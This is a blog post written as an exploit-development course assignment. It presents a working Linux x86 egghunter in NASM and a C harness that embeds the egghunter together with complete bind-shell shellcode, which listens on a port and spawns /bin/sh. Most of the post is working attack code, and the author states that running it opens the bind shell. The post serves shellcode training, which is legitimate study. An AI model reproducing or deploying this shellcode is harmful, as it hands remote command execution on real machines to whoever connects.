This assignment is about writing a working demo of an egghunter. An egghunter code is basically a piece of code that is searching for a code word (the egg) in the memory. When the egg was found, the egghunter code jumps to the address behind the egg and executes the code at this address. For further explanation read:
Click to access egghunt-shellcode.pdf
I used the second example (access revisited) for building my egghunter.
First the egghunter code:
egghunter.nasm
global _start section .text _start: xor edx,edx doloop: or dx,0xfff nextaddr: inc edx lea ebx,[edx+0x4] push byte +0x21 pop eax int 0x80 cmp al,0xf2 jz doloop mov eax,0x50905090 mov edi,edx scasd jnz nextaddr scasd jnz nextaddr jmp edi
And the demo code:
poc.c
#include<stdio.h> #include<string.h> unsigned char egghunter[] = \ "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\x50\x90\x50\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7"; // add some data char stuff[] = "Eat my shorts"; // bind shellcode unsigned char shellcode[] = \ "\x90\x50\x90\x50" //egg "\x90\x50\x90\x50" //egg "\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x02\x59\xb0\x3f\xcd\x80\x49\xb0\x3f\xcd\x80\x49\xb0\x3f\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"; main() { printf("Shellcode Length: %d\n", strlen(shellcode)); printf("Egghunter Length: %d\n", strlen(egghunter)); int (*ret)() = (int(*)())egghunter; ret(); }
When this is executed, the bind shell is up. For the shellcode I used the bind shellcode from assignment 1, but any shellcode can be used here. Compiling and extracting the shellcode is the same as in assignment 1 and 2, so I won’t repeat the procedure here.
Get the code.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342
danielsauder 
Leave a Reply